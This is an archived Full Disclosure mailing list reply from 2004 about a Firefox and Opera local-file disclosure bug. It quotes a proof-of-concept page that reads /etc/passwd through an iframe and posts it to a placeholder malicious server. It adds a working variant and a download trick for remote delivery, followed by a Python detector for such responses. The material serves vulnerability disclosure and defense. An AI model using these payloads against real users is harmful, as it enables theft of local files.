Full Disclosure mailing list archives
Re: Disclosure of local file content in Mozilla Firefox and Opera
From: Juergen Schmidt <ju () heisec de>
Date: Mon, 6 Dec 2004 19:30:59 +0100 (CET)
On Mon, 6 Dec 2004, Giovanni Delvecchio wrote:
> PoC:
> ===
> Read a local file by innerHTML method:
> --------------------------------------------------------
> <HTML>
> <BODY onLoad="ReadFileContent()" >
> <iframe name="local_file" src="file:///etc/passwd" height=0 width=0></iframe>
> <form name="module" method="post" action="http://malicious_server/grab.php" ENCTYPE="text/plain">
> <input name="content" type="hidden" size="300" >
> </form>
> <script>
> function ReadFileContent(){
>   alert(local_file.document.all(0).innerHTML);
>   document.module.content.value+=local_file.document.all(0).innerHTML;
>   //send content to malicious_server
>   document.module.submit();
> }
> </script>
> </body>
> </html>
While I can confirm that this works with FF 1.0, older versions like 0.9.3 and Mozilla 1.7.3 choked on document.all, which isn't really supported by Mozilla's DOM. I got it to work with document.firstChild:

---
<HTML>
<BODY onLoad="ReadFileContent()" >
<iframe id="local_file" name="local_file" src="file:///etc/passwd" height=0 width=0>
</iframe>
<script>
function ReadFileContent(){
  alert(local_file.document.firstChild.innerHTML);
}
</script>
</body></html>
---

This worked with all versions of Mozilla and Firefox I checked.
> Possible method of remote exploitation:
> ================================
> Question: How could a malicious remote user exploit it?
> My idea is the following:
>
> After the user "victim" has requested http://malicious_server/page.htm, if malicious_server responds with a page containing an unknown Content-Type field (for example text/html. , note the dot), the browser will show a dialog window with some options (open, save, cancel). Choosing "Open" to view this page, it will be downloaded and opened locally; JavaScript code will be executed in local context.
I am offered to "Open with GNU Emacs (default)" under Linux -- but this may have been configured by me a long time ago. On Windows, I can have the default opener set to my browser by adding:

Content-Disposition: attachment; filename=cttest.html

(the .html is important).

bye, ju

--
Juergen Schmidt       Chefredakteur heise Security       www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511 5352 300   FAX +49 511 5352 417   EMail ju () heisec de
GPG-Key: 0x38EA4970, 5D7B 476D 84D5 94FF E7C5 67BE F895 0A18 38EA 4970

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
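The delivery trick discussed in this thread leaves two things a proxy or web filter can check for: an HTML body served under a media type the browser will not render inline (so it offers open/save), or an attachment whose filename ends in .html, and a page that frames a file:// URL. The following detection routine is an added example, not code from the original posts or from either author; the allowlist of renderable types and the two sample responses are constructed for illustration.

```python
import re

# Media types a browser of that era rendered inline without asking; anything
# else triggers the open/save dialog the thread describes. Constructed list.
RENDERABLE_TYPES = {
    "text/html", "text/plain", "text/css", "text/xml", "application/xml",
    "application/xhtml+xml", "text/javascript", "application/x-javascript",
    "image/gif", "image/jpeg", "image/png",
}

HTML_MARKERS = re.compile(rb"<\s*(html|body|script|iframe|frame)\b", re.I)
FILE_FRAME = re.compile(rb"""<\s*i?frame[^>]*\bsrc\s*=\s*["']?file:""", re.I)
HTML_FILENAME = re.compile(r"""filename\s*=\s*"?([^";]+)""", re.I)


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status line, headers, body).
    Header names are lower-cased; a repeated header keeps its last value."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    status = lines[0] if lines else ""
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return status, headers, body


def media_type(content_type: str) -> str:
    """Return type/subtype of a Content-Type value, lower-cased, parameters
    dropped. 'text/html.' is returned unchanged so the trailing dot is
    visible to the allowlist check (it is a syntactically valid token)."""
    return content_type.split(";", 1)[0].strip().lower()


def analyze_response(raw: bytes) -> dict:
    """Return the declared media type and a list of findings for one response."""
    status, headers, body = parse_response(raw)
    findings = []
    ctype = media_type(headers.get("content-type", ""))
    looks_like_html = bool(HTML_MARKERS.search(body[:4096]))

    # HTML under an unrecognised type: the browser asks open/save instead of rendering.
    if ctype and looks_like_html and ctype not in RENDERABLE_TYPES:
        findings.append(f"html body served with non-renderable Content-Type {ctype!r}")

    # Forced download with an .html name: the saved copy runs from the local filesystem.
    disp = headers.get("content-disposition", "")
    if disp.lower().startswith("attachment"):
        m = HTML_FILENAME.search(disp)
        name = m.group(1).strip() if m else ""
        if name.lower().endswith((".htm", ".html")):
            findings.append(f"attachment forces download of HTML file {name!r}")

    # A frame pointing at file:// is the access pattern the PoC relies on.
    if FILE_FRAME.search(body):
        findings.append("page frames a file:// URL")

    return {"status": status, "content_type": ctype, "findings": findings}


# Constructed sample responses (not captured traffic).
LURE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html.\r\n"
    b"Content-Disposition: attachment; filename=cttest.html\r\n"
    b"\r\n"
    b"<html><body onLoad=\"f()\">"
    b"<iframe name=\"local_file\" src=\"file:///etc/passwd\" height=0 width=0></iframe>"
    b"</body></html>"
)

BENIGN = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"\r\n"
    b"<html><body><p>hello</p></body></html>"
)

if __name__ == "__main__":
    for label, sample in (("lure", LURE), ("benign", BENIGN)):
        result = analyze_response(sample)
        print(label, result["content_type"], result["findings"])
```

Each of the three checks is independent, so a response that only mis-declares its type, or only forces a download, still produces a finding; the combination seen in the thread produces all three.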
Current thread:
- Disclosure of local file content in Mozilla Firefox and Opera Giovanni Delvecchio (Dec 06)
- Re: Disclosure of local file content in Mozilla Firefox and Opera Juergen Schmidt (Dec 06)
- <Possible follow-ups>
- RE: Disclosure of local file content in Mozilla Firefox and Opera Thor Larholm (Dec 06)
- RE: Disclosure of local file content in Mozilla Firefox and Opera Giovanni Delvecchio (Dec 06)